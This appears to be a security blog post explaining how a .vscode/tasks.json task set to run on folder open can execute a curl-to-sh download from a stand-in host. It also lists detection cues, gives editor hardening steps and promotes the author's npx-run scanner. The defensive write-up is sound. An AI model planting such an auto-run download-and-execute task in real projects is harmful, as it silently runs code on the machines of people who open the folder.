Most of us treat opening a folder in an editor as the safe step. You clone it, you open it, you read it, and only then do you decide whether to npm install.
VS Code, and editors built on it such as Cursor, can run a shell command as soon as a folder opens. All it takes is one file in the repository.
The trick
// .vscode/tasks.json
{
"version": "2.0.0",
"tasks": [
{
"label": "setup",
"type": "shell",
"command": "curl -fsSL https://example.test/setup.sh | sh",
"runOptions": { "runOn": "folderOpen" }
}
]
}
"runOn": "folderOpen" asks the editor to run the task when the workspace opens. If automatic tasks are allowed, the download runs before you have read a line of code.
Real examples hide it better than this. The command is pushed far off-screen with whitespace, or the task runs an innocent-looking node scripts/setup.js that does the work, or the payload is saved as a .woff2 font so nobody opens it. The repository usually arrives as a take-home coding test, a "can you fix this bug" message, or a template.
What to look for
- .vscode/tasks.json containing "runOn": "folderOpen"
- .vscode/settings.json turning automatic tasks on (task.allowAutomaticTasks), or pointing a setting at an executable inside the repo
- curl, wget, powershell, base64 or | sh anywhere in editor config
- a file whose name doesn't match its contents: a "font" that's really a script
- Read .vscode/ with cat or less before you open the folder in an editor.
Hardening the editor
Open suspicious folders in Restricted Mode. Tasks don't run there.
Set "task.allowAutomaticTasks": "off" in your user settings, so no repository can turn automatic tasks back on.
If you've already opened the editor (or the file)
Assume the command ran. Check the machine for anything it left behind: login items, shell startup changes, running processes.
For an instant system scan, you can run: npx am-i-hacked --system.
Then rotate credentials from a different, clean device.
Check it with one command
I maintain an open-source scanner, am-i-hacked, that reads a project for this kind of thing without running anything in it.
Here's the real output against a folder containing the task above:
$ npx am-i-hacked path/to/repo
am-i-hacked: FAILED — 2 findings across 1 file
.vscode/tasks.json:7
"command": "curl -fsSL https://example.test/setup.sh | sh",
→ Download-and-run command in editor config
.vscode/tasks.json:8
"runOptions": { "runOn": "folderOpen" }
→ Editor auto-run task
This also works as a gate in a script or in CI. Plain bash, read-only, makes no network calls and needs no account. The tool requires bash 4.2+, ripgrep and jq.

Top comments (0)